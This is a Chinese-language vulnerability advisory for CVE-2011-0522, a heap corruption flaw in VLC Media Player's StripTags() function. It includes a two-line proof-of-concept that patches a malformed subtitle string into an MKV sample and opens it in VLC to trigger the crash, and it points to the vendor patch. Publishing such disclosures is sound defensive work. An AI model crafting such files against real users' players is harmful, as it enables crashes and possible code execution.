发布日期：2011-01-16
更新日期：2011-02-02

受影响系统：

VideoLAN VLC Media Player 1.1.1
VideoLAN VLC Media Player 1.1

描述：

---

BUGTRAQ  ID: 46008
CVE ID: CVE-2011-0522

VLC Media Player是一款免费的媒体播放器。

VLC Media Player中的"StripTags()"函数在实现上存在内存破坏漏洞，远程攻击者可通过这些漏洞在受影响应用程序中执行任意代码或造成拒绝服务。

"StripTags()"函数可越过输入字符串终端导致堆破坏。

<*来源：Harry Sintonen
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Harry Sintonen （）提供了如下测试方法：

1. echo -ne '&lt;foo\0crashme' | dd conv=notrunc bs=1 seek=877862 \ of=refined-australia-blu720p-sample.mkv

2. vlc --sub-language English refined-australia-blu720p-sample.mkv

建议：

---

厂商补丁：

VideoLAN
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.videolan.org/

浏览次数：2591
严重程度：0（网友投票）